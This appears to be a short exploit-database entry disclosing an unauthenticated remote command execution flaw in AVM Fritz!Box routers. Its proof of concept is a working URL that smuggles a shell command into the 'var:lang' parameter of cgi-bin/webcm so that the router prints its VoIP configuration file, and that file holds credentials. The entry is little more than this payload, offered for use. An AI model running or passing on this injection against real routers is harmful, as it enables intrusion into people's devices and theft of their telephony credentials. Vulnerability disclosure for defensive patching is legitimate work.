Fritz!Box - Remote command Execution Exploit

2014-05-01 13:05:03

App : Fritz!Box
Author : 0x4148

Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw

Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26

#0x4148_rise

Fixes

No fixes

In order to submit a new fix you need to be registered.